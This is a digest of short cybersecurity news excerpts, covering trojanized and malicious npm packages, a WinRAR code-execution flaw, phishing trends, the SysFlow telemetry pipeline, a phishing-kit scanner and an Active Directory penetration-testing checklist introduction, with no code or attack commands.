CISA warns of trojanized versions of JavaScript library’s NPM package

From hackread.com

On Friday, the US Cybersecurity and Infrastructure Security Agency (CISA) released a warning to disclose an incident related to the GitHub Advisory Database. According to CISA, a crypto-mining malware was hidden in a popular JavaScript NPM library, UAParser.js.

The library rakes in more than six to eight million downloadsper week and is used in websites and applications to identify browsers and systems used. The NPM platform became a part of Microsoft-owned GitHub in 2020.

Read more…

SysFlow – Cloud-native System Telemetry Pipeline

From kitploit.com

What is SysFlow?

The SysFlow Telemetry Pipeline is a framework for monitoring cloud workloads and for creating performance and security analytics. The goal of this project is to build all the plumbing required for system telemetry so that users can focus on writing and sharing analytics on a scalable, common open-source platform. The backbone of the telemetry pipeline is a new data format called SysFlow, which lifts raw system event information into an abstraction that describes process behaviors, and their relationships with containers, files, and network. This object-relational format is highly compact, yet it provides broad visibility into container clouds. We have also built several APIs that allow users to process SysFlow with their favorite toolkits. Learn more about SysFlow in the SysFlow specification document.

Read more…

Human Hacking and Multi-Channel Phishing is Surging

From securityboulevard.com

Zoom Phishing Attack

Human hacking is a modern way to think about phishing in its entirety, which is anything malicious that reaches a user to steal credentials, data, or financial information. By focusing on phishing as an email problem or a spam problem is giving hackers the upper hand. Today, only protecting email and leaving other digital communication channels unprotected from phishing enables hackers to target your high-value users with increased success. The shift to remote work requires a shift in focus to multi-channel phishing protection. Hackers are capitalizing on digital channels that aid the productivity of remote workers like SMS/Text, Slack, LinkedIn, Zoom, Microsoft Teams, Google Meet, and WhatsApp. These channels are less protected and provide an easy way to trick users, steal credentials, and ultimately exfiltrate data from an organization.

Read more…

kit_hunter: basic phishing kit scanner for dedicated and semi-dedicated hosting

From securityonline.info

Kit Hunter is a personal project to learn Python and a basic scanning tool that will search directories and locate phishing kits based on established markers. As detection happens, a report is generated for administrators.

By default, the script will generate a report that shows the files that were detected as potentially problematic, list the markers that indicated them as problematic (a.k.a. tags), and then show the exact line of code where the detection happened.

Read more…

Active Directory Penetration Testing Checklist

From gbhackers.com

Active Directory Penetration Testing Checklist

This article covers Active directory penetration testing that can help for penetration testers and security experts who want to secure their network.

Active Directory” Called as “AD” is a directory service that Microsoft developed for the Windows domain network. Using it you can to control domain computers and services that are running on every node of your domain.

Active Directory Penetration Testing

In this section, we have some levels, the first level is reconnaissance your network. every user can enter a domain by having an account in the domain controller (DC).

All this information is just gathered by the user that is an AD user. In the username, there are two parts that first is the domain name and the second part is your username. like below :

Read more…

New WinRAR Trial Version Vulnerability Let Hackers Execute Arbitrary Code on Windows

From cybersecuritynews.com

New WinRAR Trial Version Vulnerability Let Hackers Execute Arbitrary Code on Windows

A critical vulnerability that exists in the WinRAR file archiver has been detected recently by the security expert of Positive Technologies, Igor Sak-Sakovskiy. And this security flaw enables the hackers to execute arbitrary code on Windows systems.

WinRAR is an application for managing archive files on Windows operating systems. It allows for the creation and unpacking of common archive formats such as RAR and ZIP.

This vulnerability has been identified as CVE-2021-35052, and this is being used to demonstrate trial period termination messages.

Read more…

Malicious Packages Disguised as JavaScript Libraries Found

From govinfosecurity.com

Malicious Packages Disguised as JavaScript Libraries Found

Researchers at open-source software firm Sonatype have uncovered multiple malicious packages that disguise themselves as legitimate JavaScript libraries on npm registries to launch cryptominers on Windows, macOS and Linux machines.

An npm registry is a database of JavaScript packages, comprising software and metadata that are used by open-source developers to support JavaScript code sharing.

The researchers reported the malicious packages to npm on Oct. 15, 2021, and it took them down within hours of their release, the report says.

The researchers at Sonatype have attributed the ownership of the malicious packages to an author whose account is currently deactivated, the report notes.

Read more…